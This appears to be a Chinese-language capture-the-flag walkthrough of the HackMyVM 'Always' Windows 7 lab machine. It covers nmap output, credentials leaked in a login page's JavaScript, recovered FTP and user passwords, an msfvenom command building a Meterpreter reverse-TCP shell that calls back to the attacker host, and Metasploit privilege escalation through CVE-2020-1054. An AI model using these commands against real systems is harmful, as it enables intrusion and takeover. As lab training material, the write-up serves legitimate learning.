hackmyvm_always

寻找靶机+初步扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -sC 192.168.106.135                                                                            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-25 09:03 EDT
Nmap scan report for 192.168.106.135
Host is up (0.00037s latency).
Not shown: 987 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp    open  ssh          OpenSSH for_Windows_9.5 (protocol 2.0)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
8080/tcp  open  http         Apache httpd 2.4.57 ((Win64))
|_http-server-header: Apache/2.4.57 (Win64)
|_http-open-proxy: Proxy might be redirecting requests
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: We Are Sorry
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:0C:29:35:C5:3D (VMware)
Service Info: Host: ALWAYS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Always-PC
|   NetBIOS computer name: ALWAYS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-04-25T21:04:48+03:00
| smb2-time: 
|   date: 2025-04-25T18:04:48
|_  start_date: 2025-04-25T18:01:03
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: ALWAYS-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:35:c5:3d (VMware)
|_clock-skew: mean: 3h59m59s, deviation: 1h43m55s, median: 4h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.90 seconds
                                                                                                            

根据所得信息我们先去尝试

FTP（端口 21）——匿名登录尝试

失败了进行下一步

去8080端口扫目录

扫到了后台登陆页面

<script>
        function validateForm() {
            const username = document.getElementById("username").value;
            const password = document.getElementById("password").value;
            const errorMessage = document.getElementById("errorMessage");

            
            if (username === "admin" && password === "adminpass123") {
                return true; 
            }

            errorMessage.textContent = "Invalid Username Or Password!";
            return false; 
        }
    </script>
密码直接就给你了

得到了ftp的登录用户

登陆后进行信息收集

找到了一些信息包括用户always的登陆密码

base64解一下即可

去登陆时发现登录失败

smb,ssh都失败

…..

截至至现在我们拿到了两组密码和用户

always:YouCantFindMe.!.!
ftpuser:KeepGoingBro!!!

利用ftpuser:KeepGoingBro!!!进行尝试

smb的IPC成功但是什么都看不到

ssh成功

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.101.127 lport=6000 -f exe -o test.exe

生成Meterpreter shell exe

传到靶机上

主机监听,靶机执行文件即可

当前用户没有找到flag

提权

利用
multi/recon/local_exploit_suggester

找到了十二条可用的payload

第六个成功了

bg
退出当前会话
use multi/recon/local_exploit_suggester
set session 1
run
使用模板寻找可利用提权模板
use windows/local/cve_2020_1054_drawiconex_lpe
set session 1
run
提权

在always桌面找到第一个

在administrator桌面下找到第二个flag